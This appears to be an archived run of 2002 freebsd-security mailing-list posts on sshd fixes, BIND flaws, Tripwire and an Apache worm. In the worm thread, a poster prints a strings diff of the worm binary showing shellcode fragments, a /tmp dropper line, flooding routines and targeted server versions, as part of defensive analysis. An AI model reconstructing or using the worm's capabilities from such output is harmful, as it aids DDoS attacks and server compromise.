X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --IS0zKkzwUGydFO0o Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable chris, thanks a lot man, you definately saved my day. i spent quite some time today together with truss and ktrace/kdump and gdb to get a grip on what makes sshd 3.4p1 barf. it's a pretty strange behaviour. apparently the openssh-portable port works on a RELENG_4 system as of last week, just out of the box. on a 4.3-STABLE box your modification ist needed. would it make sense to include copying /etc/resolv.conf in the install target of openssh/openssh-portable? (maintainer on cc:) regards, /k Chris Johnson(cjohnson@palomine.net)@2002.06.27 18:57:47 +0000: > On Thu, Jun 27, 2002 at 05:50:52PM -0500, Emacs wrote: > > I did this as well, but my ssh is hanging at login on 2 of my 4 boxes. > > Any ideas? >=20 > # cp /etc/resolv.conf /usr/local/empty/etc/resolv.conf > # chmod 755 /usr/local/empty >=20 > (If yours is set up with /var/empty instead of /usr/local/empty, make the > appropriate change above.) >=20 > I don't know the implications of having /usr/local/empty with mode 755 in= stead > of 700. Previous versions of the port created it with 755, while the curr= ent > version creates it with 700. It does solve the problem for me. >=20 > I also don't know why this step is necessary sometimes and sometimes not.= It > happened on three of the ten or so boxes I installed openssh-portable-3.4= p1 on, > and I don't see the rhyme or reason. >=20 > Chris --=20 > I wouldn't mind dying -- it's that business of having to stay dead that > scares the shit out of me. --R. Geis WebMonster Community Project -- Reliable and quick since 1998 -- All on BSD http://www.webmonster.de/ - ftp://ftp.webmonster.de/ - http://www.rohrbach.= de/ GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6 REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44 My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/ Please do not remove my address from To: and Cc: fields in mailing lists. 1= 0x --IS0zKkzwUGydFO0o Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Comment: For info see http://www.gnupg.org iD8DBQE9HNkys5Nr9N7JSKYRAr4kAKCb2loKxo3ayWa4G6P51oQwqkjBfQCdGZx6 y5sDQPe4tPtgeV1lt7AlWN8= =EkES -----END PGP SIGNATURE----- --IS0zKkzwUGydFO0o-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 14:48:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 83C3737B401 for ; Fri, 28 Jun 2002 14:48:49 -0700 (PDT) Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by mx1.FreeBSD.org (Postfix) with ESMTP id B844143E06 for ; Fri, 28 Jun 2002 14:48:45 -0700 (PDT) (envelope-from pjklist@ekahuna.com) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Fri, 28 Jun 2002 14:48:44 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: security@FreeBSD.ORG Date: Fri, 28 Jun 2002 14:48:44 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Nessus without X-Windows? Reply-To: pjklist@ekahuna.com X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020628214844803.AAA830@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I want to use Nessus but I don't want to install a ton of graphical junk on the target server. Info at the Nessus home page indicates that you can build the server portion without Gnome/X-Windows, and either use a character-based client, or I presume an external GUI client. However in the FreeBSD html README file it says the following: "This port requires package(s) "XFree86-3.3.6_4 gettext-0.10.35 glib-1.2.8 gtk-1.2.8 [...] nmap-2.53" to build. This port requires package(s) "lynx-2.8.3.1 nmap-2.53" to run." So not only does it appear to have dependencies on X, but also on versions of other things I don't have. (I just updated nmap to 2.54x, and I have lynx-2.8.4d4) Am I going to have any success with this? I do have the option "WITHOUT_X11=yes" in my make.conf file. Thx, Phil -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 14:51:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B80F937B400 for ; Fri, 28 Jun 2002 14:51:46 -0700 (PDT) Received: from neptun.twoj.pl (neptun.goo.pl [80.48.39.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id D0DAA43E0F for ; Fri, 28 Jun 2002 14:51:42 -0700 (PDT) (envelope-from bugtraq-return-5402-cinek=goo.pl@securityfocus.com) Received: by neptun.twoj.pl (Postfix, from userid 107) id 0957B3ABC8; Fri, 28 Jun 2002 23:51:40 +0200 (CEST) Received: from outgoing.securityfocus.com (outgoing3.securityfocus.com [66.38.151.27]) by neptun.twoj.pl (Postfix) with ESMTP id 158053AB9B for ; Fri, 28 Jun 2002 23:51:39 +0200 (CEST) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with QMQP id C787FA32BA; Fri, 28 Jun 2002 15:47:25 -0600 (MDT) Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 3817 invoked from network); 28 Jun 2002 20:28:12 -0000 X-Authentication-Warning: axis.tdd.lt: midom owned process doing -bs Date: Fri, 28 Jun 2002 22:28:46 +0200 (EET) From: Domas Mituzas X-X-Sender: midom@axis.tdd.lt To: bugtraq@securityfocus.com, Subject: apache-worm.c Message-ID: <20020628222723.G59739-100000@axis.tdd.lt> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, no need for further binary analysis, I've got the source in my inbox: http://dammit.lt/apache-worm/apache-worm.c Regards, Domas Mituzas MicroLink Data To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 15:50: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0484237B49F for ; Fri, 28 Jun 2002 15:49:28 -0700 (PDT) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by mx1.FreeBSD.org (Postfix) with ESMTP id F3A5343FB7 for ; Fri, 28 Jun 2002 15:30:45 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5SMSZ6I061316; Sat, 29 Jun 2002 00:28:36 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Pat Lashley Cc: FreeBSD Security Mailling List Subject: Re: Jailing SSHd [Was: Re: OpenSSH Security (just a question, please no f-war)] In-Reply-To: Your message of "Wed, 26 Jun 2002 17:22:53 PDT." <2849830000.1025137373@mccaffrey.phoenix.volant.org> Date: Sat, 29 Jun 2002 00:28:35 +0200 Message-ID: <61315.1025303315@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <2849830000.1025137373@mccaffrey.phoenix.volant.org>, Pat Lashley wr ites: >--==========236915482========== >Content-Type: text/plain; charset=us-ascii; format=flowed >Content-Transfer-Encoding: quoted-printable >Content-Disposition: inline > >--On Wednesday, June 26, 2002 09:07:36 PM +0200 Poul-Henning Kamp=20 > wrote: > >> Which reminds me that we should really tweak the code and put it in a >> jail instead of a chroot. > >Careful there. Some of us are using SSH to log into jails running virtual >hosting environments. The default installation needs to be able to run if >it is already within a jail when sshd is started. You could just fall back to chroot(2) if jail(2) failed. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 16: 4:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 917D937B408 for ; Fri, 28 Jun 2002 16:03:58 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id C474743E09 for ; Fri, 28 Jun 2002 15:59:31 -0700 (PDT) (envelope-from brett@lariat.org) Received: (from root@localhost) by lariat.org (8.9.3/8.9.3) id QAA03790 for security@freebsd.org; Fri, 28 Jun 2002 16:59:25 -0600 (MDT) Date: Fri, 28 Jun 2002 16:59:25 -0600 (MDT) From: Brett Glass Message-Id: <200206282259.QAA03790@lariat.org> To: security@freebsd.org Subject: libc flaw: BIND 9 closes most holes but also opens one Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I've installed BIND 9 on our main domain name server to shield systems (including Windows boxes, which may be vulnerable) from the libc hole. Unfortunately, according to ISC, BIND 9 comes with a version of libbind that's vulnerable. (See http://www.cert.org/advisories/CA-2002-19.html.) So, if you load up BIND 9 and an app that uses it (such as Sendmail) links to the vulnerable libbind, you're still exposed. This problem may take even longer to mop up than I first thought (and I was pessimistic to start with). I was slated to build a new server today, but since 4.6-RELEASE-p1 isn't yet up on the Japanese snapshot server yet, I think I'll wait. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 16:41: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E899337B400 for ; Fri, 28 Jun 2002 16:40:58 -0700 (PDT) Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2838643E0A for ; Fri, 28 Jun 2002 16:40:58 -0700 (PDT) (envelope-from trevor@jpj.net) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g5SNeuOa047203; Fri, 28 Jun 2002 19:40:56 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g5SNeuIF047197; Fri, 28 Jun 2002 19:40:56 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Fri, 28 Jun 2002 19:40:56 -0400 (EDT) From: Trevor Johnson To: "Dalin S. Owen" Cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH Patches In-Reply-To: <20020628115027.A92508@nexusxi.com> Message-ID: <20020628193052.A42173-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Are there going to be patches for the bundled FreeBSD OpenSSH anytime > soon, so I can patch my 4.6-RELEASE system? :) Have you found a bug in your OpenSSH? > Also, when is the > apache13-ssl port going to be un-banned and updated? The port was updated, and the FORBIDDEN line removed, in revision 1.103 of the Makefile (June 22, 2002). -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 16:58:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8AB3337B400 for ; Fri, 28 Jun 2002 16:58:29 -0700 (PDT) Received: from mail.baysec.org (baysec.org [66.35.227.180]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4591843E09 for ; Fri, 28 Jun 2002 16:58:29 -0700 (PDT) (envelope-from jluster@baysec.org) Received: from jluster by mail.baysec.org with local (Exim 4.02) id 17O5d1-0008z3-00; Fri, 28 Jun 2002 16:58:15 -0700 Date: Fri, 28 Jun 2002 16:58:15 -0700 From: Jonas M Luster To: Domas Mituzas Cc: bugtraq@securityfocus.com, freebsd-security@freebsd.org Subject: Re: apache-worm.c Message-ID: <20020628165815.A34506@baysec.org> Mail-Followup-To: Jonas M Luster , Domas Mituzas , bugtraq@securityfocus.com, freebsd-security@freebsd.org References: <20020628222723.G59739-100000@axis.tdd.lt> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020628222723.G59739-100000@axis.tdd.lt> User-Agent: Mutt/1.3.22.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Quoting Domas Mituzas (domas.mituzas@microlink.lt): > Hi, > > no need for further binary analysis, I've got the source in my inbox: > > http://dammit.lt/apache-worm/apache-worm.c This seems to be a different source than the one, the binary was compiled from. The binary uses a lynx version string while this one uses User-Agent: Mozilla/4.75 [en] instead. -- Jonas M Luster -- d-fensive networks, Inc. -- http://www.d-fensive.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 17: 4: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D927337B401 for ; Fri, 28 Jun 2002 17:04:01 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id A6F2643E1D for ; Fri, 28 Jun 2002 17:03:59 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA04519; Fri, 28 Jun 2002 18:03:30 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020628180253.038e7af0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 28 Jun 2002 18:03:28 -0600 To: Jonas M Luster , Domas Mituzas From: Brett Glass Subject: Re: apache-worm.c Cc: bugtraq@securityfocus.com, freebsd-security@FreeBSD.ORG In-Reply-To: <20020628165815.A34506@baysec.org> References: <20020628222723.G59739-100000@axis.tdd.lt> <20020628222723.G59739-100000@axis.tdd.lt> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:58 PM 6/28/2002, Jonas M Luster wrote: >This seems to be a different source than the one, the binary was >compiled from. The binary uses a lynx version string while this one >uses User-Agent: Mozilla/4.75 [en] instead. Aha! Perhaps the worm's author was seeking to mislead Domas, and others, about what it did and how. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 17:18: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 04DDB37B405 for ; Fri, 28 Jun 2002 17:17:46 -0700 (PDT) Received: from axis.tdd.lt (axis.tdd.lt [213.197.128.94]) by mx1.FreeBSD.org (Postfix) with ESMTP id DF2A043E09 for ; Fri, 28 Jun 2002 17:17:44 -0700 (PDT) (envelope-from domas.mituzas@microlink.lt) Received: from localhost (midom@localhost) by axis.tdd.lt (8.11.6/8.11.6) with ESMTP id g5T0HZV92649; Sat, 29 Jun 2002 02:17:35 +0200 (EET) (envelope-from domas.mituzas@microlink.lt) X-Authentication-Warning: axis.tdd.lt: midom owned process doing -bs Date: Sat, 29 Jun 2002 02:17:35 +0200 (EET) From: Domas Mituzas X-X-Sender: midom@axis.tdd.lt To: Brett Glass Cc: Jonas M Luster , , Subject: Re: apache-worm.c In-Reply-To: <4.3.2.7.2.20020628180253.038e7af0@localhost> Message-ID: <20020629020911.Q91607-100000@axis.tdd.lt> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Then, we can see, that the real worm is slightly modificated, but still, it's quite similiar, so we can say it's same origin. Anyway, not too much to fool about, we can obviously see some DDoS nature in it. But still, there may be more functionality. Also, after some investigation on normal boxes I saw this worm-like activity starting since Jun 25. Is it date of birth? Anyone seeing theese lines? [Fri Jun 28 21:31:51 2002] [error] [client 213.154.128.145] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / Regards, Domas Mituzas MicroLink Data midom@flock ~> make apache-worm 2>/dev/null cc -O -pipe -march=pentiumpro apache-worm.c -o apache-worm midom@flock ~> strings apache-worm | sort > a midom@flock ~> strings .a | sort > b --- b Sat Jun 29 02:11:44 2002 +++ a Sat Jun 29 02:11:54 2002 @@ -1,12 +1,18 @@ !"#&(+,-./0123456789=>?@ABCDPQ + / H +$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.6 2002/05/15 04:19:49 obrien Exp $ +$FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.5 2002/05/15 04:19:49 obrien Exp $ %c%s %d.%d.%d.%d %s [base 2] ... ,$s'1 +,[^_] +,[^_] ----DATA---- ----EMAILS---- ----FROM---- ----SUBJECT---- +-Enc .gov .hlp /bin @@ -21,11 +27,15 @@ /usr/libexec/ld-elf.so.1 12.127.17.71 127.0.0.1 -8$t -8/u -8/u -8/u -: u' +; u1 +;tiB +< v2 +<0.t +<[^_] +<[^_] +>F;u +>F;u +AAAA Accept-Charset: iso-8859-1,*,utf-8 Accept-Charset: iso-8859-1,*,utf-8 Accept-Encoding: gzip @@ -38,6 +48,8 @@ Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept: text/html, text/plain, text/sgml, */*;q=0.01 Apache +BBBB +CCCCf Cannot packet local networks Checksum for data failed Connection: Keep-Alive @@ -50,6 +62,7 @@ Dns flooding target Error communicating with website Error: %s +F;50 FreeBSD FreeBSD 4.5 x86 / Apache/1.3.20 (Unix) FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix) @@ -63,63 +76,37 @@ Host: %s Host: %s:80 Host: %s:80 -Host: Unknown Insufficient memory Invalid IP Invalid instance or socket +L[^_] Location MAIL FROM:<%s> Message-ID: <%x.%x.%x@aol.com> Mime-Version: 1.0 Operation Success Operation pending -POST / HTTP/1.1 +POST PPPP PPPP PQP1 PQSP -Ph $ -Ph ' -Ph B -Ph B -Ph J -Ph J -Ph+) -Ph:( -Ph>( -PhA' -PhA' -PhD' -PhD' -PhG' -PhG' -PhG( -PhJ' -PhW( -PhW) -Ph`$ -Phg' Phn/shh//bi -Phw) -Pj-j Port is in use QUIT RCPT TO:<%s> Return-Path: <%c%c%c%c%c%c%c@aol.com> -Rh5( -Rh5( -Rh=) -RjFh` SPP1 Sending packets to target Server: Set-Cookie Size must be less than or equal to 9216 Subject: %s +TTP/ Tcp flooding target Timed out while receiving data To: %s -Transfer-Encoding: chunked +Tran UNKNOWN-CHECKSUM-SUCCESSFUL Udp flooding target Unable to bind socket @@ -135,9 +122,22 @@ User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) XXXXX /tmp/.uua << __eof__; select sendto +sfer signal -sleep -snprintf socket -sprintf srand strcasecmp strchr strcmp strcpy strdup -strlen -strncmp strtok -time +t: U tolower usleep vsnprintf @@ -225,3 +216,4 @@ waitpid webmaster@mydomain.com write +|[^_] On Fri, 28 Jun 2002, Brett Glass wrote: > At 05:58 PM 6/28/2002, Jonas M Luster wrote: > > >This seems to be a different source than the one, the binary was > >compiled from. The binary uses a lynx version string while this one > >uses User-Agent: Mozilla/4.75 [en] instead. > > Aha! Perhaps the worm's author was seeking to mislead Domas, and > others, about what it did and how. > > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 17:22:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A44FD37B400 for ; Fri, 28 Jun 2002 17:22:50 -0700 (PDT) Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id ED7E743E09 for ; Fri, 28 Jun 2002 17:22:49 -0700 (PDT) (envelope-from andrew@scoop.co.nz) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5T0MmkI092270; Sat, 29 Jun 2002 12:22:49 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Sat, 29 Jun 2002 12:22:48 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: Cy Schubert - CITS Open Systems Group Cc: Jan Lentfer , FreeBSD Security Mailling List Subject: Re: Tripwire for Dummies In-Reply-To: <200206281633.g5SGXQ4V001429@cwsys.cwsent.com> Message-ID: <20020629121442.Y90506-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 28 Jun 2002, Cy Schubert - CITS Open Systems Group wrote: > In message <1025280108.2819.27.camel@jan-linux.lan>, Jan Lentfer writes: > > > could someone be so kind and point my nose to a configuration How-To of > > Tripwire for a dummie like me? > > I'm assuming you're talking about configuring the Tripwire 2.3 port, > not the 1.2 or 1.3 ports. If so, here is a good document to start you > off. > > http://download.sourceforge.net/tripwire/tripwire-2.3.0-docs-pdf.tar.gz Since the topic has come up, I thought I'd mention that I just sent in a port for 'l5', a minimalist tool which might be a good substitute for tripwire in some circumstances. http://www.freebsd.org/cgi/query-pr.cgi?pr=39970 This is far simpler than tripwire - it just recurses file trees and lists file details, including MD5 sums. Whatever checks you want to run can then be implemented using other simple tools like diff, grep and sed, or perhaps with perl. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 17:41: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 97F4137B400 for ; Fri, 28 Jun 2002 17:40:57 -0700 (PDT) Received: from spqr.osg.gov.bc.ca (spqr.osg.gov.bc.ca [142.32.102.24]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1DC1643E06 for ; Fri, 28 Jun 2002 17:40:57 -0700 (PDT) (envelope-from Cy.Schubert@osg.gov.bc.ca) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by spqr.osg.gov.bc.ca (Postfix) with ESMTP id C097B9EE10; Fri, 28 Jun 2002 17:40:56 -0700 (PDT) Received: from cwsys.cwsent.com (cwsys2 [10.1.2.1]) by passer.osg.gov.bc.ca (8.12.5/8.12.3) with ESMTP id g5T0etOX051265; Fri, 28 Jun 2002 17:40:56 -0700 (PDT) (envelope-from cy@cwsent.com) Received: from cwsys (localhost [127.0.0.1]) by cwsys.cwsent.com (8.12.5/8.12.3) with ESMTP id g5T0et4V008342; Fri, 28 Jun 2002 17:40:55 -0700 (PDT) (envelope-from cy@cwsys.cwsent.com) Message-Id: <200206290040.g5T0et4V008342@cwsys.cwsent.com> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 Reply-To: Cy Schubert - CITS Open Systems Group From: Cy Schubert - CITS Open Systems Group X-os: FreeBSD X-Sender: cy@cwsent.com To: Andrew McNaughton Cc: Cy Schubert - CITS Open Systems Group , Jan Lentfer , FreeBSD Security Mailling List Subject: Re: Tripwire for Dummies In-Reply-To: Message from Andrew McNaughton of "Sat, 29 Jun 2002 12:22:48 +1200." <20020629121442.Y90506-100000@a2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 28 Jun 2002 17:40:55 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <20020629121442.Y90506-100000@a2>, Andrew McNaughton writes: > > > On Fri, 28 Jun 2002, Cy Schubert - CITS Open Systems Group wrote: > > > In message <1025280108.2819.27.camel@jan-linux.lan>, Jan Lentfer writes: > > > > > could someone be so kind and point my nose to a configuration How-To of > > > Tripwire for a dummie like me? > > > > I'm assuming you're talking about configuring the Tripwire 2.3 port, > > not the 1.2 or 1.3 ports. If so, here is a good document to start you > > off. > > > > http://download.sourceforge.net/tripwire/tripwire-2.3.0-docs-pdf.tar.gz > > Since the topic has come up, I thought I'd mention that I just sent in a > port for 'l5', a minimalist tool which might be a good substitute for > tripwire in some circumstances. > > http://www.freebsd.org/cgi/query-pr.cgi?pr=39970 > > This is far simpler than tripwire - it just recurses file trees and lists > file details, including MD5 sums. Whatever checks you want to run can > then be implemented using other simple tools like diff, grep and sed, or > perhaps with perl. I'll find some time to look at it. I'm hosting a barbecue at my place this weekend so I'll be spending most of my time cleaning junk my wife collected in the yard (she's out of town for a couple of weeks so it gives me license to do some tidying up without interference, e.g. haul some of this stuff to the trash pit -- getting rid of the trash is not the issue but the method I will choose is -- a real life bikeshed issue). But I promise to look at it on Tuesday. Deal? I've assigned the PR to myself. -- Cheers, Phone: 250-387-8437 Cy Schubert Fax: 250-387-5766 Team Leader, Sun/Alpha Team Email: Cy.Schubert@osg.gov.bc.ca Open Systems Group, CITS Ministry of Management Services Province of BC FreeBSD UNIX: cy@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 28 17:48:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 54DE237B400; Fri, 28 Jun 2002 17:48:17 -0700 (PDT) Received: from blue.gerhardt-it.com (gw.gerhardt-it.com [204.83.38.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6A9FF43E06; Fri, 28 Jun 2002 17:48:16 -0700 (PDT) (envelope-from scott@gerhardt-it.com) Received: from [192.168.100.111] (gw.gerhardt-it.com [204.83.38.103]) by blue.gerhardt-it.com (Postfix) with ESMTP id 0C06710024; Fri, 28 Jun 2002 18:48:15 -0600 (CST) User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Fri, 28 Jun 2002 18:48:01 -0600 Subject: Patching sshd From: Scott Gerhardt To: FreeBSD , Message-ID: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Trying to patch my system for fix this apparent sshd vulnerability. I tried patching my 4.5-Release box as outlined in #2 below with no luck. I keep getting the following error when executing the following command: # cd /usr/src/secure/usr.sbin/sshd # make depend && make all install make: don't know how to make login_access.c. Stop I don't want to rebuild the whole system. Suggestions welcome. _______________________________ Do one of the following: [For OpenSSH included in the base system] 1) Upgrade the vulnerable system to 4.4-RELEASEp9, 4.5-RELEASEp2, or 4.5-STABLE after the correction date and rebuild. 2) FreeBSD 4.x systems prior to the correction date: The following patch has been verified to apply to FreeBSD 4.4-RELEASE, 4.5-RELEASE, and 4.5-STABLE dated prior to the correction date. It may or may not apply to older, unsupported versions of FreeBSD. Download the patch and the detached PGP signature from the following locations, and verify the signature using your 